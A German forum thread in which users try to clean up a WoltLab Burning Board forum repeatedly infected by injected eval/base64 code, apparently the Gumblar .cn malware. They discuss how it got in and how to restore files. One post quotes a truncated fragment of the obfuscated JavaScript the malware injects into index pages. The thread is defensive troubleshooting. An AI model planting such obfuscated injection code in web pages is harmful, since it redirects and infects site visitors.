Zum vierten mal .....Forum infiziert! (eval(base64_decode....)

  • Was mich ein wenig stutzig macht, ist das Auffinden der Datei thumbs.db im Foren Ordner. Diese Datei gehört nicht zum Forum und wurde auch in keinem anderen Ordner gefunden.


    Das muss nichts heißen. Ich habe schon öfter in Pluginpaketen beispielsweise in Ordnern für mitgelieferte Grafiken derartige Dateien gefunden, die dann auf diesem Wege möglicherweise auch auf den Server gelangen können.





    Gruß norse

    Zugang zu meinen Arbeiten und dem dazugehörigen Support bekommt Ihr bei Interesse hier.



  • Nochmals.... ich beahaupte nicht, dass das WBB schuld daran ist. Ich sage nur, dass es im WBB als erstes auftrat. Deshalb habe ich hier nachgesehen und den Thread eröffnet.


    Lexa


    ICh will nicht ausschließen, dass es über WP gekommen ist.


    @sonicat


    Ich bin mir noch nicht sicher. Vieleicht können wir einige Möglichkeiten ausschließen.


    Welche Aplikationen (CMS / Blogsysteme / Shopsysteme etc. ) hast Du auf dem Server laufen? Vieleicht kommen wir über Gemeinsamkeiten dem Ursprung der Sache näher!?


    Gruß


    Arno

  • Irgendwie hab ich leider immer noch keinen Plan wie ich das Problem jetzt lösen soll !
    Ist lieb und nett was joomla macht aber mir gehts ums wbb

  • Nochmals.... ich beahaupte nicht, dass das WBB schuld daran ist.


    Das habe ich auch nicht unterstellt. Mein Beitrag sollte nur ein Hinweis darauf sein, wie die Datei möglicherweise ins System gelangt sein könnte.





    Gruß norse

    Zugang zu meinen Arbeiten und dem dazugehörigen Support bekommt Ihr bei Interesse hier.

  • Irgendwie hab ich leider immer noch keinen Plan wie ich das Problem jetzt lösen soll !
    Ist lieb und nett was joomla macht aber mir gehts ums wbb



    Ich glaube nicht, dass die Dateien händisch verändert wurden. Ich habe gerade ein Anfrage bezüglich der Behebung gestellt und werde Dir mitteilen, welche Möglichkeiten mir aufgezeigt werden.
    Nochmal..... kannst Du mir sagen, welche Aplikationen (WP, Shops Foren etc.) auf Deinem System laufen? Vieleicht finden wir eine Gemeinsamkeit und können so die Lücke ausfindig machen.


    Gruß


    Arno

    • Official Post

    Irgendwie hab ich leider immer noch keinen Plan wie ich das Problem jetzt lösen soll !
    Ist lieb und nett was joomla macht aber mir gehts ums wbb


    Wenn du so unbedingt dein Forum wieder ans laufen bekommen willst, dann spiel ein Backup der FTP Dateien auf. Die sollten normalerweise noch nicht kompromittiert sein. Nichtsdestotrotz musst du dich um die Ursachenforschung kümmern.

  • Moment ich glaub ihr versteht da leider was faslch. oder ich habs falsch vermittelt !


    Die Domains laufen nicht auf unseren Servern sondern beim provider und der Snap jeden Tag und überschreibt !
    Die Domain war schon vor dem Server da, es laufen nur Exchange und konsorten drüber.


    Was ich zur FEhlerbehebung beitragen kann ist also nicht viel
    SBS2008 fertig aus , aus fertig !
    Kein Joomla nichts !
    Es muss eine versteckte Datei sein, die sich auf jeden offenen Pfad einnistet, den nerst als ich ein jpg in unseren Shop via FTP hochgeladen habe, heute ab dabb war die andere Domain auch futsch, allerdings scheint die sich gerne auch auch html zu bezeihen nicht nur php. speziell auf index Seiten !!!!!


    Müsste mal versuchen eine neue Index für wbb hochzuladen !


  • Sorry Norse..... bin momentan ein wenig gestersst...


    @sonicat


    Liegt der Shop auf einen anderen Server? Verstehe ich das richtig, auf dem Forenserver liegt nur dass WBB.


    Hhmmmm....... ich habe zuerst vermutet, es handelt sich um einen Gumbler .cn Exploit dieser würde sich über das eigene FTP (meist FileZilla) weiter verbreiten. Auf Grund dieser Annahme habe ich sämtlich Rechner scannen lassen. Ergbenis = Alles Sauber.


    Die Vorgehensweise ist eigentlich typisch für diese Maleware. Er fügt folgendes Script...... <script language=javascript><!--
    (function(xwBPE){var k9E='var>20>61>3d>22>53>63r>69p>74Engine>22>2c ...... ein. Der Provider prüft immer noch die Logs (hoffe ich.....dauert irgendwie ziemlich lange)


    Das Problem ist folgendes. Gumbler .cn Exploit ist ziemlich übel. Der Grund ist recht einfach. Die betroffenen Webseiten landen recht schnell in den Spamdatenbanken da die Maleware, den User von den Google Suchergebnissen auf eine flasche Seite geleitet wird.


    So das ist momentan der Stand. Zur Behebung hilft die PHP Datei von Seite 1.


    - Betroffene Dateien ausfindig machen und Code entfernen. (Alternativ Backup aufspielen)


    Zuvor muß jedoch die Lücke (der offene Zugang) für den Angreifer geschlossen werden. Sonst geht das Spielchen von vorne los.


    Nun stehen wir wieder am Anfang wo ist die Lücke.....?????


    Gruß


    Arno

  • Du kannst es dir doch beantworten indem du schaust ob in deinem Forum die FTP-Zugangsdaten gespeichert sind. Normal ist das nicht nötig und von daher kann der Angreifer auch nicht die FTP-Daten vom Forum bekommen haben.
    Thumbs.db ist von Windows eine Cachedatei, die hat der Angreifer wohl mit hochgeladen.

  • Du kannst es dir doch beantworten indem du schaust ob in deinem Forum die FTP-Zugangsdaten gespeichert sind. Normal ist das nicht nötig und von daher kann der Angreifer auch nicht die FTP-Daten vom Forum bekommen haben.
    Thumbs.db ist von Windows eine Cachedatei, die hat der Angreifer wohl mit hochgeladen.


    In welcher Datei finde ich die hinterlegten Daten? Ein Zugriff auf das Forum ist leider nicht mehr möglich. Ich glaube nicht dass die Datei zufällig mit hochgeladen wurde, da sich in der Datei lediglich ein Script und der eval Code befunden hat.


    Gruß


    Arno

  • Ich habe nun via Script die Codes entfernt die geschrieben wurden !
    Allerdings sind jetzt einige Dateien beschädigt auch die Index.
    Das routen hat aufgehört, ich ersetze jetzt die Dateien,
    theoretisch könnte ich doch alles mit ner frisch gedownloadeteten 316 überschreiben oder ?

  • Muaha muss ich meinen Progger fragen, der hat mir Mail geschrieben mit dem Inhalt


    Hallo Chef, alles gesäubert, schnauze voll bis Montag !
    Ich frag ihn !
    Könnte euch ja auch helfen !


    Kann ich einfach ne frisch gedownloadete 316 via FTP drüber schreiben ?

  • Das Problem ist folgendes. Gumbler .cn Exploit ist ziemlich übel. Der Grund ist recht einfach. Die betroffenen Webseiten landen recht schnell in den Spamdatenbanken da die Maleware, den User von den Google Suchergebnissen auf eine flasche Seite geleitet wird.


    Du hast Angst, dass deine Seite als Malware-Seite markiert wird?
    Dann schalte den Webserver ab und du kannst in Ruhe dich um die Probleme kümmern.


    Kann ich einfach ne frisch gedownloadete 316 via FTP drüber schreiben ?


    Welche Dateien willst du wo einfach überschreiben?

    Meine Beiträge sind nur Hilfestellungen und Anregungen zur Lösung von einem Problem.
    Ein wenig Mitdenken ist dennoch erforderlich!


    Im WCF werden Passwörter nicht verschlüsselt, sondern gehasht!
    (Hash ist eine "Verschlüsselung", wo du den Schlüssel wegwirfst. ;))

  • In welcher Datei finde ich die hinterlegten Daten?


    FTP-User und FTP-Passwort nirgends - außer jemand hat sie separat irgendwo geschrieben und abgespeichert.


    Ein Zugriff auf das Forum ist leider nicht mehr möglich.


    Gemeint ist hier eher via FTP nicht via Browser.


    Ich glaube nicht dass die Datei zufällig mit hochgeladen wurde, da sich in der Datei lediglich ein Script und der eval Code befunden hat.


    In der thumbs.db-Datei? Standardmäßig enthält sie Bildvorschaudaten für den Windows-Explorer. Sie wird vom Windows-Explorer in jedem Verzeichnis abgelegt, das mindestens eine Datei mit einer einer Bildverarbeitung zugeordneten Dateiendung enthält. Läuft das Forum auf einem Windows-Server, kann es diese Datei massenweise geben. Ist es ein Linux/UNIX-Server, kommt es auf doe FTP-Programme an, die eingesetzt werden. Eine Windows-Explorer FTP-Erweiterung erzeugt dann auch auf der "UNIX-Seite" diese Dateien.


    @sonicat:

    Quote

    Kann ich einfach ne frisch gedownloadete 316 via FTP drüber schreiben ?


    Auf eigenes Risiko. Wenn Du nur ein einziges Plugin drin hast, das Templates verändert hat, dann geht das schief.


    Grüße
    Uli